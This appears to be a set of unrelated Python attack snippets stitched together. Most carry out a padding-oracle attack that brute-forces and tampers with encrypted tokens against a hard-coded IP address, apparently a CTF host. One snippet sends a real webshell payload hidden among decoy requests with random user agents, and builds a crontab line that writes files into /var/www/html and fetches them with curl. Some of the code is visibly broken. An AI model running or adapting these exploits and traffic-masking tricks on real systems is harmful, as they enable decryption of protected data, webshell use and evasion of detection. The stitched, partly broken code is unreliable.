def decript_data(url, hash):
ehash = common.b64e(hash)
#r = requests.get(f'{url}?post={ehash}', proxies={'http':'http://127.0.0.1:8080'}, allow_redirects=False)
r = requests.get(f'{url}?post={ehash}', allow_redirects=False)
if 'PaddingException' in r.text:
raise Exception('error de padding')
return extract_data(r.text)
def prepare(self):
self.ammunitions = []
_num = random.randint(6, 18)
_real = random.randint(1, 18)
logger.info("[+] Mix Flow Number : %d" % _num)
for i in range(_num):
rsa = 0
if random.choice([1, 0]):
shell_name = self.random_shell_name()
else:
shell_name = self.shell
if _real == i:
# 攻击流量
shell_name = self.shell
if self.passwd:
data = {self.passwd: self.payload}
else:
data = self.payload
rsa = 1
logger.debug("[#] Real Attack %s" % shell_name)
elif i % 2 == 0:
data = {
'p': md5(str(random.randint(1000000, 1000050))),
'c': self.random_data()
}
else:
data = b64e(self.random_bytes())
rsa = 1
headers = {"User-Agent": random.choice(USER_AGENTS)}
self.ammunitions.append({
"data": data,
"headers": headers,
"name": shell_name,
"rsa": rsa
})
def random_data(self, target="", path="/var/www/html/"):
k = random.randint(1, 12)
keyworkd = random.choice(KEYWORDS)
if k > 3:
name = self.random_shell_name()
keyworkd = "echo '*/1 * * * * /bin/cat /tmp/{} > {}{};/usr/bin/curl \"{}{}\"' | crontab".format(
self.random_str(), path, name, target, name)
elif k > 6:
keyworkd = (b64e(keyworkd) * random.randint(3, 5))
elif k > 9:
keyworkd = keyworkd
return keyworkd
import binascii
with open('hash.bin', 'rb') as f:
hash_ = f.read()
print(binascii.hexlify(hash_))
import common
import base64
print(base64.b64encode(hash_))
print(common.b64e(hash_))
dhash = common.b64d(hash_)
lhash = list(dhash)
tamano = len(dhash)
print('hash:')
utils.print_hash(dhash)
inicio = tamano - ((16 * 2) + 1)
fin = tamano - 16
lblock = lhash[inicio:fin]
solucion = {}
for h in range(15, 0, -1):
for i in range(0, 256):
lblock[h] = i
rhash = lhash[:inicio] + lblock + lhash[fin:]
bhash = bytes(rhash)
shash = common.b64e(bhash)
print(f'{h},{i}')
text = utils.test_hash(shash)
if 'PaddingException' not in text and 'Error' not in text:
utils.print_hash(bhash)
print(text)
print(i)
solucion[h] = i
print(solucion)
break
print(solucion)
p = requests.post("http://35.227.24.107/51980f8ea3/",
data={
'title': title,
'body': body
},
proxies={'http': 'http://127.0.0.1:8080'},
allow_redirects=False)
if not p.ok:
print('error generando hash : ')
print(p.text)
print(p.status_code)
sys.exit(1)
html = p.text
m = rhash.search(html)
if not m:
print('algo salió mal extrayendo el hash')
sys.exit(1)
hash_ = m.group(1)
print(hash_)
dhash = common.b64d(hash_)
nhash = dhash[16:0] + dhash[:16]
print(binascii.hexlify(dhash))
print(binascii.hexlify(nhash))
hash_ = common.b64e(nhash)
print(hash_)
r = requests.get(f'http://35.227.24.107/51980f8ea3/?post={hash_}',
proxies={'http': 'http://127.0.0.1:8080'},
allow_redirects=False)
print(r.text)
import requests
import common
import utils
url = 'http://35.227.24.107/b6b38fea92/'
registers = []
for i in range(100):
p = bytes([0 for _ in range(i)])
try:
ehash = common.b64e(p)
r = requests.get(f'{url}?post={ehash}',
proxies={'http': 'http://127.0.0.1:8080'},
allow_redirects=False)
if 'IV must be 16 bytes long' in r.text:
registers.append(i)
except Exception as e:
pass
print(registers)
import sys
import binascii
import common
a = sys.argv[1]
with open(a, 'rb') as f:
hash_ = f.read()
print(binascii.hexlify(hash_))
print(common.b64e(hash_).encode('utf8'))